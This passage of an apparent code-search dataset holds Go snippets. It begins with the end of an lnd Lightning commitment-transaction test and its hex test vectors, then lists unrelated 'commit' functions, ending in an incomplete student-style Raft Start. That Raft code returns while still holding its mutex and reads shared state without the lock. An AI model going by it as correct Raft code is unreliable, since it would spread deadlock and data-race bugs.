\"3045022100a12a9a473ece548584aabdd051779025a5ed4077c4b7aa376ec7a0b1645e5a48022039490b333f53b5b3e2ddde1d809e492cba2b3e5fc3a436cd3ffb4cd3d500fa5a\",\n\t\t\t\t\tresolutionTxHex: \"02000000000101fb824d4e4dafc0f567789dee3a6bce8d411fe80f5563d8cdfdcc7d7e4447d43a020000000000000000019a090000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100a12a9a473ece548584aabdd051779025a5ed4077c4b7aa376ec7a0b1645e5a48022039490b333f53b5b3e2ddde1d809e492cba2b3e5fc3a436cd3ffb4cd3d500fa5a01483045022100ff200bc934ab26ce9a559e998ceb0aee53bc40368e114ab9d3054d9960546e2802202496856ca163ac12c143110b6b3ac9d598df7254f2e17b3b94c3ab5301f4c3b0012004040404040404040404040404040404040404040404040404040404040404048a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a91418bc1a114ccf9c052d3d23e28d3b0a9d1227434288527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f801b175ac686800000000\",\n\t\t\t\t},\n\t\t\t},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8005d007000000000000220020403d394747cae42e98ff01734ad5c08f82ba123d3d9a620abda88989651e2ab5b80b000000000000220020c20b5d1f8584fd90443e7b7b720136174fa4b9333c261d04dbbd012635c0f419a00f0000000000002200208c48d15160397c9731df9bc3b236656efb6665fbfe92b4a6878e88a499f741c4c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de84311040966a00000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e040047304402203b1b010c109c2ecbe7feb2d259b9c4126bd5dc99ee693c422ec0a5781fe161ba0220571fe4e2c649dea9c7aaf7e49b382962f6a3494963c97d80fef9a430ca3f706101483045022100d33c4e541aa1d255d41ea9a3b443b3b822ad8f7f86862638aac1f69f8f760577022007e2a18e6931ce3d3a804b1c78eda1de17dbe1fb7a95488c9a4ec8620395334801475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"3045022100d33c4e541aa1d255d41ea9a3b443b3b822ad8f7f86862638aac1f69f8f760577022007e2a18e6931ce3d3a804b1c78eda1de17dbe1fb7a95488c9a4ec86203953348\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 2195,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{\n\t\t\t\t{\n\t\t\t\t\tindex: 3,\n\t\t\t\t\tremoteSigHex: \"3045022100a8a78fa1016a5c5c3704f2e8908715a3cef66723fb95f3132ec4d2d05cd84fb4022025ac49287b0861ec21932405f5600cbce94313dbde0e6c5d5af1b3366d8afbfc\",\n\t\t\t\t\tresolutionTxHex: \"020000000001014e16c488fa158431c1a82e8f661240ec0a71ba0ce92f2721a6538c510226ad5c0000000000000000000109060000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100a8a78fa1016a5c5c3704f2e8908715a3cef66723fb95f3132ec4d2d05cd84fb4022025ac49287b0861ec21932405f5600cbce94313dbde0e6c5d5af1b3366d8afbfc01483045022100be6ae1977fd7b630a53623f3f25c542317ccfc2b971782802a4f1ef538eb22b402207edc4d0408f8f38fd3c7365d1cfc26511b7cd2d4fecd8b005fba3cd5bc70439001008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a9148a486ff2e31d6158bf39e2608864d63fefd09d5b88ac6868f7010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 4,\n\t\t\t\t\tremoteSigHex: \"3045022100e769cb156aa2f7515d126cef7a69968629620ce82afcaa9e210969de6850df4602200b16b3f3486a229a48aadde520dbee31ae340dbadaffae74fbb56681fef27b92\",\n\t\t\t\t\tresolutionTxHex: \"020000000001014e16c488fa158431c1a82e8f661240ec0a71ba0ce92f2721a6538c510226ad5c0100000000000000000199090000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100e769cb156aa2f7515d126cef7a69968629620ce82afcaa9e210969de6850df4602200b16b3f3486a229a48aadde520dbee31ae340dbadaffae74fbb56681fef27b92014730440220665b9cb4a978c09d1ca8977a534999bc8a49da624d0c5439451dd69cde1a003d022070eae0620f01f3c1bd029cc1488da13fb40fdab76f396ccd335479a11c5276d8012004040404040404040404040404040404040404040404040404040404040404048a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a91418bc1a114ccf9c052d3d23e28d3b0a9d1227434288527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f801b175ac686800000000\",\n\t\t\t\t},\n\t\t\t},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8004b80b000000000000220020c20b5d1f8584fd90443e7b7b720136174fa4b9333c261d04dbbd012635c0f419a00f0000000000002200208c48d15160397c9731df9bc3b236656efb6665fbfe92b4a6878e88a499f741c4c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de843110b8976a00000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e040047304402203b12d44254244b8ff3bb4129b0920fd45120ab42f553d9976394b099d500c99e02205e95bb7a3164852ef0c48f9e0eaf145218f8e2c41251b231f03cbdc4f29a54290147304402205e2f76d4657fb732c0dfc820a18a7301e368f5799e06b7828007633741bda6df0220458009ae59d0c6246065c419359e05eb2a4b4ef4a1b310cc912db44eb792429801475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"304402205e2f76d4657fb732c0dfc820a18a7301e368f5799e06b7828007633741bda6df0220458009ae59d0c6246065c419359e05eb2a4b4ef4a1b310cc912db44eb7924298\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 3702,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{\n\t\t\t\t{\n\t\t\t\t\tindex: 3,\n\t\t\t\t\tremoteSigHex: \"3045022100dfb73b4fe961b31a859b2bb1f4f15cabab9265016dd0272323dc6a9e85885c54022059a7b87c02861ee70662907f25ce11597d7b68d3399443a831ae40e777b76bdb\",\n\t\t\t\t\tresolutionTxHex: \"02000000000101b8de11eb51c22498fe39722c7227b6e55ff1a94146cf638458cb9bc6a060d3a30000000000000000000122020000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100dfb73b4fe961b31a859b2bb1f4f15cabab9265016dd0272323dc6a9e85885c54022059a7b87c02861ee70662907f25ce11597d7b68d3399443a831ae40e777b76bdb0147304402202765b9c9ece4f127fa5407faf66da4c5ce2719cdbe47cd3175fc7d48b482e43d02205605125925e07bad1e41c618a4b434d72c88a164981c4b8af5eaf4ee9142ec3a01008576a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c820120876475527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae67a9148a486ff2e31d6158bf39e2608864d63fefd09d5b88ac6868f7010000\",\n\t\t\t\t},\n\t\t\t\t{\n\t\t\t\t\tindex: 4,\n\t\t\t\t\tremoteSigHex: \"3045022100ea9dc2a7c3c3640334dab733bb4e036e32a3106dc707b24227874fa4f7da746802204d672f7ac0fe765931a8df10b81e53a3242dd32bd9dc9331eb4a596da87954e9\",\n\t\t\t\t\tresolutionTxHex: \"02000000000101b8de11eb51c22498fe39722c7227b6e55ff1a94146cf638458cb9bc6a060d3a30100000000000000000176050000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100ea9dc2a7c3c3640334dab733bb4e036e32a3106dc707b24227874fa4f7da746802204d672f7ac0fe765931a8df10b81e53a3242dd32bd9dc9331eb4a596da87954e9014730440220048a41c660c4841693de037d00a407810389f4574b3286afb7bc392a438fa3f802200401d71fa87c64fe621b49ac07e3bf85157ac680acb977124da28652cc7f1a5c012004040404040404040404040404040404040404040404040404040404040404048a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a91418bc1a114ccf9c052d3d23e28d3b0a9d1227434288527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f801b175ac686800000000\",\n\t\t\t\t},\n\t\t\t},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8004b80b000000000000220020c20b5d1f8584fd90443e7b7b720136174fa4b9333c261d04dbbd012635c0f419a00f0000000000002200208c48d15160397c9731df9bc3b236656efb6665fbfe92b4a6878e88a499f741c4c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de8431106f916a00000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e040047304402200e930a43c7951162dc15a2b7344f48091c74c70f7024e7116e900d8bcfba861c022066fa6cbda3929e21daa2e7e16a4b948db7e8919ef978402360d1095ffdaff7b001483045022100c1a3b0b60ca092ed5080121f26a74a20cec6bdee3f8e47bae973fcdceb3eda5502207d467a9873c939bf3aa758014ae67295fedbca52412633f7e5b2670fc7c381c101475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"3045022100c1a3b0b60ca092ed5080121f26a74a20cec6bdee3f8e47bae973fcdceb3eda5502207d467a9873c939bf3aa758014ae67295fedbca52412633f7e5b2670fc7c381c1\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 3703,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{\n\t\t\t\t{\n\t\t\t\t\tindex: 4,\n\t\t\t\t\tremoteSigHex: \"3044022044f65cf833afdcb9d18795ca93f7230005777662539815b8a601eeb3e57129a902206a4bf3e53392affbba52640627defa8dc8af61c958c9e827b2798ab45828abdd\",\n\t\t\t\t\tresolutionTxHex: \"020000000001011c076aa7fb3d7460d10df69432c904227ea84bbf3134d4ceee5fb0f135ef206d0000000000000000000175050000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500473044022044f65cf833afdcb9d18795ca93f7230005777662539815b8a601eeb3e57129a902206a4bf3e53392affbba52640627defa8dc8af61c958c9e827b2798ab45828abdd01483045022100b94d931a811b32eeb885c28ddcf999ae1981893b21dd1329929543fe87ce793002206370107fdd151c5f2384f9ceb71b3107c69c74c8ed5a28a94a4ab2d27d3b0724012004040404040404040404040404040404040404040404040404040404040404048a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a91418bc1a114ccf9c052d3d23e28d3b0a9d1227434288527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f801b175ac686800000000\",\n\t\t\t\t},\n\t\t\t},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8003a00f0000000000002200208c48d15160397c9731df9bc3b236656efb6665fbfe92b4a6878e88a499f741c4c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de843110eb936a00000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0400473044022047305531dd44391dce03ae20f8735005c615eb077a974edb0059ea1a311857d602202e0ed6972fbdd1e8cb542b06e0929bc41b2ddf236e04cb75edd56151f4197506014830450221008b7c191dd46893b67b628e618d2dc8e81169d38bade310181ab77d7c94c6675e02203b4dd131fd7c9deb299560983dcdc485545c98f989f7ae8180c28289f9e6bdb001475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"30450221008b7c191dd46893b67b628e618d2dc8e81169d38bade310181ab77d7c94c6675e02203b4dd131fd7c9deb299560983dcdc485545c98f989f7ae8180c28289f9e6bdb0\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 4914,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{\n\t\t\t\t{\n\t\t\t\t\tindex: 4,\n\t\t\t\t\tremoteSigHex: \"3045022100fcb38506bfa11c02874092a843d0cc0a8613c23b639832564a5f69020cb0f6ba02206508b9e91eaa001425c190c68ee5f887e1ad5b1b314002e74db9dbd9e42dbecf\",\n\t\t\t\t\tresolutionTxHex: \"0200000000010110a3fdcbcd5db477cd3ad465e7f501ffa8c437e8301f00a6061138590add757f0000000000000000000122020000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0500483045022100fcb38506bfa11c02874092a843d0cc0a8613c23b639832564a5f69020cb0f6ba02206508b9e91eaa001425c190c68ee5f887e1ad5b1b314002e74db9dbd9e42dbecf0148304502210086e76b460ddd3cea10525fba298405d3fe11383e56966a5091811368362f689a02200f72ee75657915e0ede89c28709acd113ede9e1b7be520e3bc5cda425ecd6e68012004040404040404040404040404040404040404040404040404040404040404048a76a91414011f7254d96b819c76986c277d115efce6f7b58763ac67210394854aa6eab5b2a8122cc726e9dded053a2184d88256816826d6231c068d4a5b7c8201208763a91418bc1a114ccf9c052d3d23e28d3b0a9d1227434288527c21030d417a46946384f88d5f3337267c5e579765875dc4daca813e21734b140639e752ae677502f801b175ac686800000000\",\n\t\t\t\t},\n\t\t\t},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8003a00f0000000000002200208c48d15160397c9731df9bc3b236656efb6665fbfe92b4a6878e88a499f741c4c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de843110ae8f6a00000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e040047304402206a2679efa3c7aaffd2a447fd0df7aba8792858b589750f6a1203f9259173198a022008d52a0e77a99ab533c36206cb15ad7aeb2aa72b93d4b571e728cb5ec2f6fe260147304402206d6cb93969d39177a09d5d45b583f34966195b77c7e585cf47ac5cce0c90cefb022031d71ae4e33a4e80df7f981d696fbdee517337806a3c7138b7491e2cbb077a0e01475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"304402206d6cb93969d39177a09d5d45b583f34966195b77c7e585cf47ac5cce0c90cefb022031d71ae4e33a4e80df7f981d696fbdee517337806a3c7138b7491e2cbb077a0e\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 4915,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8002c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de843110fa926a00000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80e0400483045022100a012691ba6cea2f73fa8bac37750477e66363c6d28813b0bb6da77c8eb3fb0270220365e99c51304b0b1a6ab9ea1c8500db186693e39ec1ad5743ee231b0138384b90147304402200769ba89c7330dfa4feba447b6e322305f12ac7dac70ec6ba997ed7c1b598d0802204fe8d337e7fee781f9b7b1a06e580b22f4f79d740059560191d7db53f876555201475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"304402200769ba89c7330dfa4feba447b6e322305f12ac7dac70ec6ba997ed7c1b598d0802204fe8d337e7fee781f9b7b1a06e580b22f4f79d740059560191d7db53f8765552\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 9651180,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b800222020000000000002200204adb4e2f00643db396dd120d4e7dc17625f5f2c11a40d857accc862d6b7dd80ec0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de84311004004730440220514f977bf7edc442de8ce43ace9686e5ebdc0f893033f13e40fb46c8b8c6e1f90220188006227d175f5c35da0b092c57bea82537aed89f7778204dc5bacf4f29f2b901473044022037f83ff00c8e5fb18ae1f918ffc24e54581775a20ff1ae719297ef066c71caa9022039c529cccd89ff6c5ed1db799614533844bd6d101da503761c45c713996e3bbd01475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"3044022037f83ff00c8e5fb18ae1f918ffc24e54581775a20ff1ae719297ef066c71caa9022039c529cccd89ff6c5ed1db799614533844bd6d101da503761c45c713996e3bbd\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 9651181,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8001c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de8431100400473044022031a82b51bd014915fe68928d1abf4b9885353fb896cac10c3fdd88d7f9c7f2e00220716bda819641d2c63e65d3549b6120112e1aeaf1742eed94a471488e79e206b101473044022064901950be922e62cbe3f2ab93de2b99f37cff9fc473e73e394b27f88ef0731d02206d1dfa227527b4df44a07599289e207d6fd9cca60c0365682dcd3deaf739567e01475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"3044022064901950be922e62cbe3f2ab93de2b99f37cff9fc473e73e394b27f88ef0731d02206d1dfa227527b4df44a07599289e207d6fd9cca60c0365682dcd3deaf739567e\",\n\t\t},\n\t\t{\n\t\t\tcommitment: channeldb.ChannelCommitment{\n\t\t\t\tCommitHeight: 42,\n\t\t\t\tLocalBalance: 6988000000,\n\t\t\t\tRemoteBalance: 3000000000,\n\t\t\t\tFeePerKw: 9651936,\n\t\t\t},\n\t\t\thtlcDescs: []htlcDesc{},\n\t\t\texpectedCommitmentTxHex: \"02000000000101bef67e4e2fb9ddeeb3461973cd4c62abb35050b1add772995b820b584a488489000000000038b02b8001c0c62d0000000000160014ccf1af2f2aabee14bb40fa3851ab2301de8431100400473044022031a82b51bd014915fe68928d1abf4b9885353fb896cac10c3fdd88d7f9c7f2e00220716bda819641d2c63e65d3549b6120112e1aeaf1742eed94a471488e79e206b101473044022064901950be922e62cbe3f2ab93de2b99f37cff9fc473e73e394b27f88ef0731d02206d1dfa227527b4df44a07599289e207d6fd9cca60c0365682dcd3deaf739567e01475221023da092f6980e58d2c037173180e9a465476026ee50f96695963e8efe436f54eb21030e9f7b623d2ccc7c9bd44d66d5ce21ce504c0acf6385a132cec6d3c39fa711c152ae3e195220\",\n\t\t\tremoteSigHex: \"3044022064901950be922e62cbe3f2ab93de2b99f37cff9fc473e73e394b27f88ef0731d02206d1dfa227527b4df44a07599289e207d6fd9cca60c0365682dcd3deaf739567e\",\n\t\t},\n\t}\n\n\tfor i, test := range testCases {\n\t\texpectedCommitmentTx, err := txFromHex(test.expectedCommitmentTxHex)\n\t\tif err != nil {\n\t\t\tt.Fatalf(\"Case %d: Failed to parse serialized tx: %v\", i, err)\n\t\t}\n\n\t\t// Build required HTLC structs from raw test vector data.\n\t\thtlcs := make([]channeldb.HTLC, len(test.htlcDescs), len(test.htlcDescs))\n\t\tfor i, htlcDesc := range test.htlcDescs {\n\t\t\thtlcs[i], err = tc.getHTLC(i, &htlcDesc)\n\t\t\tif err != nil {\n\t\t\t\tt.Fatal(err)\n\t\t\t}\n\t\t}\n\t\ttheHTLCView := htlcViewFromHTLCs(htlcs)\n\n\t\tfeePerKw := chainfee.SatPerKWeight(test.commitment.FeePerKw)\n\t\tisOurs := true\n\t\theight := test.commitment.CommitHeight\n\n\t\t// Create unsigned commitment transaction.\n\t\tview, err := channel.commitBuilder.createUnsignedCommitmentTx(\n\t\t\ttest.commitment.LocalBalance,\n\t\t\ttest.commitment.RemoteBalance, isOurs, feePerKw,\n\t\t\theight, theHTLCView, keys,\n\t\t)\n\t\tif err != nil {\n\t\t\tt.Errorf(\"Case %d: Failed to create new commitment tx: %v\", i, err)\n\t\t\tcontinue\n\t\t}\n\n\t\tcommitmentView := &commitment{\n\t\t\tourBalance: view.ourBalance,\n\t\t\ttheirBalance: view.theirBalance,\n\t\t\ttxn: view.txn,\n\t\t\tfee: view.fee,\n\t\t\theight: height,\n\t\t\tfeePerKw: feePerKw,\n\t\t\tdustLimit: tc.dustLimit,\n\t\t\tisOurs: isOurs,\n\t\t}\n\n\t\t// Initialize LocalCommit, which is used in getSignedCommitTx.\n\t\tchannelState.LocalCommitment = test.commitment\n\t\tchannelState.LocalCommitment.Htlcs = htlcs\n\t\tchannelState.LocalCommitment.CommitTx = commitmentView.txn\n\n\t\t// This is the remote party's signature over the commitment\n\t\t// transaction which is included in the commitment tx's witness\n\t\t// data.\n\t\tchannelState.LocalCommitment.CommitSig, err = hex.DecodeString(test.remoteSigHex)\n\t\tif err != nil {\n\t\t\tt.Fatalf(\"Case %d: Failed to parse serialized signature: %v\",\n\t\t\t\ti, err)\n\t\t}\n\n\t\tcommitTx, err := channel.getSignedCommitTx()\n\t\tif err != nil {\n\t\t\tt.Errorf(\"Case %d: Failed to sign commitment tx: %v\", i, err)\n\t\t\tcontinue\n\t\t}\n\n\t\t// Check that commitment transaction was created correctly.\n\t\tif commitTx.WitnessHash() != *expectedCommitmentTx.WitnessHash() {\n\t\t\tt.Errorf(\"Case %d: Generated unexpected commitment tx: \"+\n\t\t\t\t\"expected %s, got %s\", i, spew.Sdump(expectedCommitmentTx),\n\t\t\t\tspew.Sdump(commitTx))\n\t\t\tcontinue\n\t\t}\n\n\t\t// Generate second-level HTLC transactions for HTLCs in\n\t\t// commitment tx.\n\t\thtlcResolutions, err := extractHtlcResolutions(\n\t\t\tchainfee.SatPerKWeight(test.commitment.FeePerKw), true,\n\t\t\tsigner, htlcs, keys, &channel.channelState.LocalChanCfg,\n\t\t\t&channel.channelState.RemoteChanCfg, commitTx.TxHash(),\n\t\t\tchannel.channelState.ChanType,\n\t\t)\n\t\tif err != nil {\n\t\t\tt.Errorf(\"Case %d: Failed to extract HTLC resolutions: %v\", i, err)\n\t\t\tcontinue\n\t\t}\n\n\t\tresolutionIdx := 0\n\t\tfor j, htlcDesc := range test.htlcDescs {\n\t\t\t// TODO: Check HTLC success transactions; currently not implemented.\n\t\t\t// resolutionIdx can be replaced by j when this is handled.\n\t\t\tif htlcs[j].Incoming {\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\texpectedTx, err := txFromHex(htlcDesc.resolutionTxHex)\n\t\t\tif err != nil {\n\t\t\t\tt.Fatalf(\"Failed to parse serialized tx: %v\", err)\n\t\t\t}\n\n\t\t\thtlcResolution := htlcResolutions.OutgoingHTLCs[resolutionIdx]\n\t\t\tresolutionIdx++\n\n\t\t\tactualTx := htlcResolution.SignedTimeoutTx\n\t\t\tif actualTx == nil {\n\t\t\t\tt.Errorf(\"Case %d: Failed to generate second level tx: \"+\n\t\t\t\t\t\"output %d, %v\", i, j,\n\t\t\t\t\thtlcResolutions.OutgoingHTLCs[j])\n\t\t\t\tcontinue\n\t\t\t}\n\n\t\t\t// Check that second-level HTLC transaction was created correctly.\n\t\t\tif actualTx.WitnessHash() != *expectedTx.WitnessHash() {\n\t\t\t\tt.Errorf(\"Case %d: Generated unexpected second level tx: \"+\n\t\t\t\t\t\"output %d, expected %s, got %s\", i, j,\n\t\t\t\t\texpectedTx.WitnessHash(), actualTx.WitnessHash())\n\t\t\t\tcontinue\n\t\t\t}\n\t\t}\n\t}\n}", "func (psm *ProtocolStateMachine) updateCommit(newCommit uint64) {\n\tif psm.debug && psm.l() {\n\t\tpsm.logger.Debug(\n\t\t\t\"updating commit\",\n\t\t\tzap.Uint64(\"oldCommit\", psm.state.Commit), zap.Uint64(\"newCommit\", newCommit))\n\t}\n\tpsm.state.Commit = newCommit\n\tpsm.commitChan <- newCommit\n\n\tcanAckProp := psm.state.Proposal.pending &&\n\t\tpsm.state.Proposal.Index <= psm.state.Commit &&\n\t\tpsm.state.Proposal.Term <= psm.state.LogTerm\n\tif canAckProp {\n\t\tpsm.endPendingProposal()\n\t}\n}", "func (b *batcher) Commit(ctx context.Context, commitInfo *files.UploadSessionFinishArg) (entry *files.FileMetadata, err error) {\n\tselect {\n\tcase <-b.closed:\n\t\treturn nil, fserrors.FatalError(errors.New(\"batcher is shutting down\"))\n\tdefault:\n\t}\n\tfs.Debugf(b.f, \"Adding %q to batch\", commitInfo.Commit.Path)\n\tresp := make(chan batcherResponse, 1)\n\tb.in <- batcherRequest{\n\t\tcommitInfo: commitInfo,\n\t\tresult: resp,\n\t}\n\t// If running async then don't wait for the result\n\tif b.async {\n\t\treturn nil, nil\n\t}\n\tresult := <-resp\n\treturn result.entry, result.err\n}", "func (tx *TestTX) Commit() error {\n\targs := tx.Called()\n\treturn args.Error(0)\n}", "func (instance *cache) CommitEntry(key string, content Cacheable) (ce *Entry, xerr fail.Error) {\n\tif instance.isNull() {\n\t\treturn nil, fail.InvalidInstanceError()\n\t}\n\tif key = strings.TrimSpace(key); key == \"\" {\n\t\treturn nil, fail.InvalidParameterCannotBeEmptyStringError(\"key\")\n\t}\n\n\tinstance.lock.Lock()\n\tdefer instance.lock.Unlock()\n\n\treturn instance.unsafeCommitEntry(key, content)\n}", "func PostCommit(handler func()) {\n\thandler()\n\tos.Exit(0)\n}", "func (rf *Raft) Start(command interface{}) (int, int, bool) {\n lastLogIndex := 0\n isLeader := true\n \n // TODO WED: check corner cases with -1\n rf.mu.Lock()\n term := rf.currentTerm\n myId := rf.me\n if len(rf.log) > 0 {\n lastLogIndex = len(rf.log)\n //term = rf.log[index].Term \n }\n \n if rf.state != Leader || rf.killed() {\n return lastLogIndex-1, term, false\n }\n \n var oneEntry LogEntry\n oneEntry.Command = command\n oneEntry.Term = term\n \n rf.log = append(rf.log, oneEntry)\n rf.mu.Unlock()\n\n \n go func() {\n \n // Add a while loop. when successReply count greater than threhsold, commit. loop breaks when successReply is equal to peers\n // the for loop inside only iterates over the left peers.\n \n var localMu sync.Mutex\n \n isLeader := true\n committed := false\n successReplyCount := 0\n var receivedResponse []int\n receivedResponse = append(receivedResponse, myId)\n\n for isLeader {\n if rf.killed() {\n fmt.Printf(\"*** Peer %d term %d: Terminated. Closing all outstanding Append Entries calls to followers.\",myId, term)\n return \n }\n\n var args = AppendEntriesArgs {\n LeaderId: myId,\n }\n rf.mu.Lock()\n numPeers := len(rf.peers)\n rf.mu.Unlock()\n\n for id := 0; id < numPeers && isLeader; id++ {\n if (!find(receivedResponse,id)) {\n if lastLogIndex < rf.nextIndex[id] {\n successReplyCount++\n receivedResponse = append(receivedResponse,id)\n continue\n }\n var logEntries []LogEntry\n logEntries = append(logEntries,rf.log[(rf.nextIndex[id]):]...)\n args.LogEntries = logEntries\n 